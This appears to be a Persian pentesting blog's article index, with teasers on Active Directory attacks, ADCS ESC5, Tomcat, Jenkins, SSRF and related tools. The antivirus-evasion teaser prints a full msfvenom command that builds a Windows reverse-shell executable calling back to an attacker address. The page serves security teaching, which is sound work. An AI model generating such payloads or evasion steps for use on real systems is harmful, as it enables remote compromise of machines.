مقالات تست نفوذ

  • بررسی حمله Kerberos Username Bruteforce در Active Directory

    بررسی حمله Kerberos Username Bruteforce در Active Directory

    در این مقاله، تکنیک بهره‌برداری (Exploitation) موسوم به Kerberos Username Bruteforce یا حمله brute-force پیش‌احراز هویت Kerberos مورد بررسی قرار می‌گیرد. این حمله با سوء‌استفاده از پاسخ‌های پروتکل Kerberos، امکان شناسایی نام‌های کاربری معتبر و انجام brute-force برای رمزهای عبور را فراهم می‌کند. مقاله حاضر روش‌های بهره‌برداری و تکنیک‌های مقابله را تشریح می‌کند و آن‌ها را برای شفافیت بیشتر به…

    بیشتر بخوانید »
  • ADCS ESC5 : آسیب‌پذیری در کنترل دسترسی به اشیاء زیرساخت کلید عمومی

    ADCS ESC5 : آسیب‌پذیری در کنترل دسترسی به اشیاء زیرساخت کلید عمومی

    حمله ESC5 یکی از حملات با ریسک بالا علیه زیرساخت سرویس‌های گواهی‌نامه‌ی Active Directory Certificate Services (ADCS) محسوب می‌شود. این نوع حمله با سوء‌استفاده از دسترسی ناایمن به کلید خصوصی مرجع صدور گواهی‌نامه (Certificate Authority – CA) انجام می‌گیرد. در شرایطی که مهاجم بتواند به سطح دسترسی مدیر محلی (Local Administrator) در سرور CA دست یابد، قادر خواهد بود کلید…

    بیشتر بخوانید »
  • بررسی ماژول Autorize در نرم افزار Burp Suite

    بررسی ماژول Autorize در نرم افزار Burp Suite

    برای محافظت از دارایی‌های آنلاین، تست امنیتی برنامه‌های تحت وب یکی از ارکان اساسی در فرآیند ایمن‌سازی آن‌ها محسوب می‌شود. ابزار Burp Suite سال‌هاست که به‌عنوان یکی از پیشروترین پلتفرم‌ها در این حوزه شناخته می‌شود و همچنان توسط کارشناسان امنیت سایبری و هکرهای کلاه‌سفید (Ethical Hackers) به‌طور گسترده مورد استفاده قرار می‌گیرد. در میان افزونه‌های مختلفی که در جامعه‌ی تست…

    بیشتر بخوانید »
  • تست نفوذ Tomcat

    تست نفوذ Tomcat

    Tomcat Penetration Testing نقش حیاتی در شناسایی آسیب‌پذیری‌های موجود در Apache Tomcat ایفا می‌کند؛ سرویسی که به‌طور گسترده به‌عنوان یک web server و servlet container در توسعه‌ی برنامه‌های تحت وب مورد استفاده قرار می‌گیرد. در ابتدا، Apache Software Foundation این پروژه را با هدف ارائه‌ی یک پلتفرم نمایشی برای فناوری‌های Java Servlet و JavaServer Pages (JSP) راه‌اندازی کرد؛ فناوری‌هایی که…

    بیشتر بخوانید »
  • تست نفوذ Jenkins

    تست نفوذ Jenkins

    تست نفوذ Jenkins برای شناسایی آسیب‌پذیری‌های امنیتی در Jenkins ضروری است. Jenkins یک سرور اتوماسیون متن‌باز است که برای پیاده‌سازی پیوسته (Continuous Integration – CI) و تحویل پیوسته (Continuous Delivery – CD) استفاده می‌شود. این ابزار که بر پایه زبان برنامه‌نویسی جاوا ساخته شده است، از یک پلتفرم اسکریپت‌نویسی بهره می‌برد تا وظایفی مانند ساخت، تست و استقرار در چرخه…

    بیشتر بخوانید »
  • روش‌های عبور از آنتی‌ویروس با بهره‌گیری از قالب‌های آماده Metasploit و ساخت فایل‌های اجرایی سفارشی

    روش‌های عبور از آنتی‌ویروس با بهره‌گیری از قالب‌های آماده Metasploit و ساخت فایل‌های اجرایی سفارشی

    در اینجا نگاهی سریع داریم به چند روش ساده برای عبور از شناسایی آنتی‌ویروس‌ها هنگام استفاده از شل‌کدها. ۴۸ مورد شناسایی از بین ۶۸ آنتی‌ویروس برای تست اولیه، یک پی‌لود Reverse Shell استاندارد با استفاده از Metasploit برای سیستم‌های ۳۲ بیتی ویندوز تولید می‌کنیم. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 -f exe > /root/tools/av.exe با بررسی این فایل در سرویس VirusTotal،…

    بیشتر بخوانید »
  • آموزش جامع ابزار Feroxbuster

    آموزش جامع ابزار Feroxbuster

    Feroxbusterیک ابزار قدرتمند است که برای شناسایی دایرکتوری‌ها (پوشه‌ها) و فایل‌ها روی سرورهای وب با استفاده از تکنیک‌های حمله Brute-force طراحی شده است. این ابزار معمولاً در تست نفوذ و ارزیابی‌های امنیتی برای شناسایی مسیرها و منابع پنهان‌شده مورد استفاده قرار می‌گیرد. در اینجا قصد داریم درباره وظایف و کارهای مختلفی که با استفاده از Feroxbuster می‌توان انجام داد، صحبت…

    بیشتر بخوانید »
  • نصب برنامه در کالی لینوکس

    نصب برنامه در کالی لینوکس

     احتمالا می‌دانید که یکی از مباحثی که در تست نفوذ باید نسبت به آن تسلط بالایی داشته باشید، کار با لینوکس و به‌خصوص کالی لینوکس است. یک راه ساده و تاثیرگذار برای یادگرفتن کار با کالی لینوکس هم نصب این سیستم‌ عامل به صورت مجازی یا مستقیم، و استفاده از آن به مدت طولانی است. اما برای کسانی که با…

    بیشتر بخوانید »
  • ssrf

    SSRF چیست؟ تشریح آسیب‌پذیری SSRF + دانلود مقاله

    در این مقاله توضیح می‌دهیم حمله‌ی SSRF (کوتاه‌شده‌ی Sever-Side Request Forgery) یا «تولید ریکوئست‌های سمت سرور» چیست؟ چند نمونه‎‌ی ساده از آن را تشریح می‌کنیم، و توضیح می‌دهیم چطور می‌توانید انواع آسیب‌پذیری‌های SSRF را شناسایی و اکسپلویت کنید. SSRF چیست؟ حملات SSRF چه عواقبی دارند؟ انواع رایج حملات SSRF حملات SSRF علیه خود سرور حملات SSRF علیه سیستم‌های بک‌اند دیگر…

    بیشتر بخوانید »
  • same origin policy

    SOP چیست؟

    سیاست مبدأ مشترک، Same Origin Policy یا به اختصار SOP، مکانیزمی امنیتی در مرورگررهای وب است که هدف آن جلوگیری از حمله‌کردن وبسایت‌ها به یکدیگر است. سیاست SOP اجازه نمی‌دهد اسکریپت‌های یک مبدأ (Origin)، به داده‌های یک مبدأ دیگر دسترسی داشته باشند. مبدأ یا Origin تشکیل شده از اسکیم URI، دامنه و شماره پورت. برای مثال، URL زیر را در…

    بیشتر بخوانید »
دکمه بازگشت به بالا